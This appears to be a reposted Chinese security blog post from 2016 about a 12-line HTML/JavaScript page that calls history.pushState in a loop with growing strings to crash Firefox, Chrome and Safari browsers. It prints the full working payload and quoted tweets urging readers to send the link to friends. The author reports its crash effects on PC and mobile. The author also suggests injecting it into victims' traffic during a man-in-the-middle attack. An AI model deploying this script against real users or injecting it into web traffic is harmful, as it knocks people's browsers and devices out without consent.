这十二行代码是如何让浏览器爆炸的?

2016 年 1 月 20 日 0 条评论 125 次阅读 0 人点赞

Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit
//使用下面这段JavaScript代码能让firefox,chrome,safari浏览器崩溃,而且还能让iphone重启。

14532951287132

继续在推特上深挖发现IT Security Tweets ™ @F1r3h4nd 于17日发推:

Crash your friend's browser and restart Iphone with a link which has this script: #0day
//把带有下面这个脚本的链接发给你的朋友,能让你朋友的浏览器崩溃,而且让Iphone重启。

14532953197708

完整HTML代码如下:

  1. <html>
  2. <body>
  3. <script>
  4. var total="";
  5. for (var i=0;i<1000000;i++)
  6. {
  7.  total= total+i.toString();
  8.  history.pushState(0,0,total);
  9. }
  10. </script>
  11. </body>
  12. </html>

点开以后,我的状态是这样的:
14532972774931

如果你是PC端用户,点开链接以后,电脑CPU内存极有可能一路狂飙直至浏览器崩溃卡死!

如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。至于在推文中提到的让iPhone重启,这一现象倒是没有出现。

思考

这是Bug还是0day?为什么会有这一现象?如何实现的?

有哪些比较有意思的利用姿势?(我先来个:当在执行MITM中间人攻击的时候,可以注入这一段js,来个恶搞整蛊。然后都懂的…)

*作者/雪碧,转载明来自FreeBuf黑客与极客(FreeBuf.COM)

kenvi

这个人太懒什么东西都没留下